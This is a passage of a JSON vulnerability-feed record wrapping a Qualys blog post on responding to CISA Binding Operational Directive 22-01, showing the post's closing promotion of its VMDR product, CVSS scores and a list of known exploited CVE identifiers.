automatically mapped into the threat feed\n * Use Patch Management to apply patches and other configurations changes\n * Track remediation progress through Unified Dashboards\n\n## Summary\n\nUnderstanding vulnerabilities is a critical but partial part of threat mitigation. Qualys VMDR helps customers discover, assess threats, assign risk, and remediate threats in one solution. Qualys customers rely on the accuracy of Qualys' threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any organization efficiently respond to the CISA directive.\n\n## Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-09T06:15:01", "type": "qualysblog", "title": "Qualys Response to CISA Alert: Binding Operational Directive 22-01", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2020-0601", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-1905", "CVE-2021-1906", "CVE-2021-20016", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-21972", "CVE-2021-21985", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-22502", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-22986", "CVE-2021-26084", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-28663", "CVE-2021-28664", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30761", "CVE-2021-30762", "CVE-2021-30807", "CVE-2021-30858", "CVE-2021-30860", "CVE-2021-30869", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40444", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42258"], "modified": "2021-11-09T06:15:01", "id": "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
CVE-2021-22502
